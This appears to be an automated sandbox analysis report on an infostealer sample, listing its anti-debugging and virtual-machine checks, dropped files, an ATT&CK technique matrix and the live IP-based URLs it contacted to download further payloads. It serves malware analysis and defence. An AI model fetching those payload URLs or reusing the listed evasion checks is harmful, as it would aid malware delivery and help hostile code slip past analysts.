Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81710 second address: 4D8176C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796B9BF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F1AE9737BD0h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F1A796B9BECh 0x00000016 adc eax, 06E2D358h 0x0000001c jmp 00007F1A796B9BEBh 0x00000021 popfd 0x00000022 movzx eax, bx 0x00000025 popad 0x00000026 or dword ptr [edx+38h], FFFFFFFFh 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F1A796B9BEDh 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8176C second address: 4D81781 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796F3551h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81781 second address: 4D81787 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81787 second address: 4D817C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796F3553h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b or dword ptr [edx+3Ch], FFFFFFFFh 0x0000000f jmp 00007F1A796F3556h 0x00000014 or dword ptr [edx+40h], FFFFFFFFh 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D817C1 second address: 4D817F9 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 672615AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F1A796B9BF4h 0x0000000e popad 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F1A796B9BF7h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D817F9 second address: 4D817FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D817FF second address: 4D81803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0560 second address: 4DA059F instructions: 0x00000000 rdtsc 0x00000002 mov dl, 1Ah 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 mov si, di 0x0000000a pop ebx 0x0000000b popad 0x0000000c xchg eax, ebp 0x0000000d jmp 00007F1A796F354Eh 0x00000012 push eax 0x00000013 jmp 00007F1A796F354Bh 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F1A796F3555h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA059F second address: 4DA05A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 825C7A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 825BC0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A52DE2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAA02D rdtsc 0_2_00AAA02D
Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 1184Jump to behavior
Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 1228Jump to behavior
Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 1225Jump to behavior
Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 1226Jump to behavior
Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 1221Jump to behavior
Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 1241Jump to behavior
Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]Jump to dropped file
Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\svtJDfvf364R4G45effw53J7\Bunifu_UI_v1.5.3.dllJump to dropped file
Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\svtJDfvf364R4G45effw53J7\Y-Cleaner.exeJump to dropped file
Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]Jump to dropped file
Source: C:\Users\user\Desktop\file.exe TID: 5316Thread sleep count: 55 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5316Thread sleep time: -110055s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7032Thread sleep count: 145 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7032Thread sleep count: 109 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7032Thread sleep count: 51 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7032Thread sleep count: 56 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5080Thread sleep count: 1184 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5080Thread sleep time: -2369184s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7032Thread sleep count: 52 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7032Thread sleep count: 42 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7032Thread sleep count: 102 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2144Thread sleep time: -36000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6100Thread sleep count: 1228 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6100Thread sleep time: -2457228s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5216Thread sleep count: 1225 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5216Thread sleep time: -2451225s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4180Thread sleep count: 1226 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4180Thread sleep time: -2453226s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6036Thread sleep count: 1221 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6036Thread sleep time: -2443221s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1216Thread sleep count: 1241 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1216Thread sleep time: -2483241s >= -30000sJump to behavior
Source: file.exe, file.exe, 00000000.00000002.2609374987.00000000009A9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.6.drBinary or memory string: VMware
Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: file.exe, 00000000.00000002.2611981318.00000000055B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2609988074.0000000000DA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.drBinary or memory string: vmci.sys
Source: Amcache.hve.6.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.drBinary or memory string: VMware20,1
Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: file.exe, 00000000.00000002.2609374987.00000000009A9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
Source: C:\Users\user\Desktop\file.exeFile opened: SICE
Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAA02D rdtsc 0_2_00AAA02D
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A54A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040A54A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402A20 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402A20
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_10007A76 mov eax, dword ptr fs:[00000030h]0_2_10007A76
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_10005F25 mov eax, dword ptr fs:[00000030h]0_2_10005F25
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CEC9DB push dword ptr fs:[00000030h]0_2_00CEC9DB
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B40D90 mov eax, dword ptr fs:[00000030h]0_2_04B40D90
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B4092B mov eax, dword ptr fs:[00000030h]0_2_04B4092B
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402EC0 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,HeapFree,VirtualAlloc,0_2_00402EC0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004099EA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004099EA
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A54A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040A54A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040CDA3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040CDA3
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A6E0 SetUnhandledExceptionFilter,0_2_0040A6E0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_10002ADF
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B49C51 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_04B49C51
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B4A7B1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_04B4A7B1
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B4D00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_04B4D00A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B4A947 SetUnhandledExceptionFilter,0_2_04B4A947
Source: file.exe, file.exe, 00000000.00000002.2609374987.00000000009A9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: bProgram Manager
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04D096AC cpuid 0_3_04D096AC
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004107E2 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_004107E2
Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
Command and Scripting Interpreter
1
DLL Side-Loading
2
Process Injection
11
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
24
Virtualization/Sandbox Evasion
LSASS Memory681
Security Software Discovery
Remote Desktop ProtocolData from Removable Media12
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
Process Injection
Security Account Manager24
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information
NTDS3
Process Discovery
Distributed Component Object ModelInput Capture11
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
Obfuscated Files or Information
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
Software Packing
Cached Domain Credentials1
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Timestomp
DCSync223
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
file.exe45%ReversingLabsWin32.Infostealer.Tinba
file.exe100%AviraHEUR/AGEN.1320706
file.exe100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\svtJDfvf364R4G45effw53J7\Y-Cleaner.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]0%ReversingLabs
C:\Users\user\AppData\Local\Temp\svtJDfvf364R4G45effw53J7\Bunifu_UI_v1.5.3.dll0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://80.82.65.70/files/download60%Avira URL Cloudsafe
http://80.82.65.70/dll/keyU0%Avira URL Cloudsafe
http://80.82.65.70/files/downloadh0%Avira URL Cloudsafe
http://80.82.65.70/files/download50%Avira URL Cloudsafe
http://80.82.65.70/files/downloadM~r0%Avira URL Cloudsafe
http://80.82.65.70/files/download0/files/download0%Avira URL Cloudsafe
http://80.82.65.70/soft/download60%Avira URL Cloudsafe
http://80.82.65.70/files/downloadA0%Avira URL Cloudsafe
http://80.82.65.70/files/download00%Avira URL Cloudsafe
http://80.82.65.70/dll/key=0%Avira URL Cloudsafe
http://80.82.65.70/add?substr=mixtwo&s=three&sub=empS0%Avira URL Cloudsafe
http://80.82.65.70/soft/downloadi~N0%Avira URL Cloudsafe
http://80.82.65.70/files/downloadF0%Avira URL Cloudsafe
http://80.82.65.70/files/download#100%Avira URL Cloudmalware
http://80.82.65.70/files/download$0%Avira URL Cloudsafe
No contacted domains info
NameMaliciousAntivirus DetectionReputation
http://80.82.65.70/soft/downloadfalse
    high
    http://80.82.65.70/add?substr=mixtwo&s=three&sub=empfalse
      high
      http://80.82.65.70/dll/downloadfalse
        high
        http://80.82.65.70/dll/keyfalse
          high
          http://80.82.65.70/files/downloadfalse
            high
            NameSourceMaliciousAntivirus DetectionReputation
            http://80.82.65.70/files/downloadhfile.exe, 00000000.00000003.2057643849.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2280659416.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2210244034.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2235376839.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082783354.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109447880.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2280585374.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2159672790.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2260450014.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313365499.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134573830.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2330322141.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2185003149.0000000005690000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://80.82.65.70/dll/keyUfile.exe, 00000000.00000002.2609988074.0000000000DA7000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://80.82.65.70/files/download0file.exe, 00000000.00000003.2057643849.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2280659416.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2210244034.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2235376839.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082783354.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109447880.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2280585374.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2159672790.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2260450014.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2032603186.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313365499.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134573830.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2330322141.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2185003149.0000000005690000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://g-cleanit.hkfile.exe, 00000000.00000003.2330322141.000000000565E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2327084794.000000000581C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2330368931.0000000005601000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2328880830.000000000581C000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drfalse
              high
              http://80.82.65.70/files/download5file.exe, 00000000.00000003.2057643849.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2280659416.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2210244034.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2235376839.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082783354.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109447880.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2007493400.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2280585374.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2159672790.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2260450014.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2032603186.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313365499.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134573830.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2330322141.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2185003149.0000000005690000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://80.82.65.70/soft/download6file.exe, 00000000.00000003.2313365499.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2330322141.0000000005690000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://80.82.65.70/files/download6file.exe, 00000000.00000003.2280659416.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2210244034.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2235376839.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2280585374.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2159672790.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2260450014.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134573830.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2185003149.0000000005690000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://80.82.65.70/files/downloadM~rfile.exe, 00000000.00000003.2280659416.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2210244034.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2235376839.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2280585374.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2159672790.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2260450014.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313365499.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2330322141.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2185003149.0000000005690000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://80.82.65.70/files/download0/files/downloadfile.exe, 00000000.00000003.2280659416.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2280585374.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2260450014.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313365499.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2330322141.0000000005690000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://80.82.65.70/dll/key=file.exe, 00000000.00000002.2609988074.0000000000DA7000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://upx.sf.netAmcache.hve.6.drfalse
                high
